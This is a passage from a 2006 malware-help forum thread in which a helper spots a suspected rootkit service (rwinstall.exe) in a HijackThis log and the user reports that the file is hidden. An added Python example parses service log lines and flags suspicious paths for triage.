This one looks suspicious and I'm guessing it's the rootkit service
O23 - Service: Event Log Reporting Service (evtlgs) - Unknown owner - C:\WINDOWS\system32\rwinstall.exe (file missing)

I doubt if the file is missing as HJT has a bug where it doesn't show some services files

can you do this please

please go to http://www.thespykiller.co.uk/forum/index.php?board=1.0 and upload these files so I can examine them and distribute them to antivirus companies.
Just press new topic, fill in the needed details and just give a link to your post here & then press the browse button and then navigate to & select the files on your computer, If there is more than 1 file then press the more attachments button for each extra file and browse and select etc and then when all the files are listed in the windows press send to upload the files ( do not post HJT logs there as they will not get dealt with)

Files to submit:

C:\WINDOWS\system32\rwinstall.exe


----------
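The two service listings in this thread (the StartupList "Name: path (start mode)" lines and the HijackThis O23 lines) were triaged by eye above; the small parser below, an added example that is not part of the thread or of either tool, does the same mechanically and flags the patterns the thread keyed on: an image loaded from dllcache, a driver outside the drivers directory, an image under a temp directory, and a service whose file HJT reports "missing". The sample lines are copied from the logs above, except the "Updater (upd)" temp entry, which is constructed.

```python
"""Triage service entries from StartupList and HijackThis (O23) log lines.

Added example, not part of the thread or of either tool.  The heuristics
encode what the thread's analysis keyed on; a hit is a lead to look at,
not proof of compromise (the avast mail scanner below is a benign "missing").
"""
import re
from typing import List, NamedTuple, Optional, Tuple

# HJT:  O23 - Service: <display> - <owner> - <path>[ (file missing)]
# Display and owner may themselves contain " - ", so anchor on the drive letter.
O23_RE = re.compile(
    r"^O23 - Service: (?P<head>.+) - (?P<path>[A-Za-z]:\\.+?)"
    r"(?P<missing> \(file missing\))?$"
)
# StartupList:  <display>: <path> (<start mode>)
SVC_RE = re.compile(
    r"^(?P<display>.+?): (?P<path>.+) "
    r"\((?P<mode>autostart|manual start|system|disabled)\)$"
)


class Finding(NamedTuple):
    display: str
    path: str
    reasons: List[str]


def parse_line(line: str) -> Optional[Tuple[str, str, bool]]:
    """Return (display name, image path, file_missing) or None for other lines."""
    m = O23_RE.match(line)
    if m:
        display, _, _owner = m.group("head").rpartition(" - ")
        display = display or m.group("head").rstrip(" -")   # empty owner field
        path = m.group("path").split('"')[0].strip()        # drop '" /service'
        return display, path, bool(m.group("missing"))
    m = SVC_RE.match(line)
    if m:
        return m.group("display"), m.group("path"), False
    return None


def image_file(path: str) -> str:
    """Bare file name: strip directory, \\??\\ prefix and service arguments."""
    exe = path.split(" -k ")[0].split(" --")[0].strip()
    return exe.rsplit("\\", 1)[-1].lower()


def assess(display: str, path: str, missing: bool) -> List[str]:
    low = path.lower().replace("/", "\\")
    reasons = []
    if missing:
        reasons.append("image reported missing: hidden file or dangling service")
    if "\\dllcache\\" in low:
        reasons.append("image loaded from dllcache (a WFP cache, never a service home)")
    if "\\temp\\" in low:
        reasons.append("image under a temp directory")
    if image_file(path).endswith(".sys") and "\\drivers\\" not in low:
        reasons.append("driver outside the drivers directory")
    return reasons


def triage(lines) -> List[Finding]:
    out = []
    for line in lines:
        parsed = parse_line(line.rstrip())
        if parsed and (reasons := assess(*parsed)):
            out.append(Finding(parsed[0], parsed[1], reasons))
    return out


# Lines copied from the listings in this thread; the "Updater" entry is constructed.
SAMPLE = r"""
Distributed Transaction Coordinator Control: \??\c:\windows\system32\dllcache\vsvss.sys (manual start)
VGA Display Controller.: \SystemRoot\System32\drivers\vga.sys (system)
MSSQLSERVER: C:\PROGRA~1\MICROS~1\MSSQL\binn\sqlservr.exe (autostart)
O23 - Service: Event Log Reporting Service (evtlgs) - Unknown owner - C:\WINDOWS\system32\rwinstall.exe (file missing)
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (file missing)
O23 - Service: MailMax 5.5 - DataMaxDB .NET (DataMaxDB) - SmartMax Software, Inc. - C:\Program Files\MailMax5\DataMaxDB.exe
O23 - Service: CCDed - - c:\webcc\ccded\ccded.exe
O23 - Service: Updater (upd) - Unknown owner - C:\WINDOWS\Temp\upd.exe
""".strip().splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.display}\n    {f.path}\n    " + "\n    ".join(f.reasons))
```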



## Gunny123 (Mar 29, 2006)

Man, you've got a good eye.

I'm sorry but as I said before I can't upload the file!!! It's not a bug in HJT, it's some type of root kit that hides itself, its process, file, etc. Also, I almost forgot about that service, but I already tried to remove it. I set it to disable, however, it still shows as automatic, so I went back to properties to disable again and by default it was at disabled!! Piece of s***.

Anyway, if you have any idea on how I can get this file even though it is doing this let me know and I'll send it. I want to send it to the AV companies bad.

Also, I'm going to try creating a file named rwinstall.exe in that directory, then rebooting, and seeing what happens. Maybe it won't be able to recreate the file and I'll get it.


----------

